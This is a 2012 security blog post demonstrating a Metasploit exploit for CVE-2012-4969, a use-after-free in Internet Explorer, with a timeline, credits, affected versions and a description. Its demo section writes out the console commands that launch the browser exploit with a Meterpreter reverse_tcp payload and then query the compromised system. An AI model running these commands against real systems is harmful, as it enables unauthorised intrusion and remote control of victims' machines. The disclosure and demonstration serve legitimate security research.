Friday, May 24, 2013
Breaking News
You are here: Home / Security / Exploits / CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Posted by: FastFlux September 19, 2012 in Exploits, Security 4 Comments

[youtube V5-3-lvI4vg]

 Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17

PoC provided by:
unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s) :
OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit blog
CVE-2012-4969
MSA-2757760

Affected versions :
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP SP3 with Internet Explorer 8

Description :
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Metasploit demo :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Tagged with:

About FastFlux

Owner of ZeroSecurity, intrested in programming, malware analysis and penetration testing. If you are interested in joining the ZeroSecurity team please use the contact forum located above to contact us.
Powered by ZeroSecurity | Designed by Tielabs
© Copyright 2013, All Rights Reserved
Scroll To Top
x
EmailEmail
PrintPrint
WP Socializer Aakash Web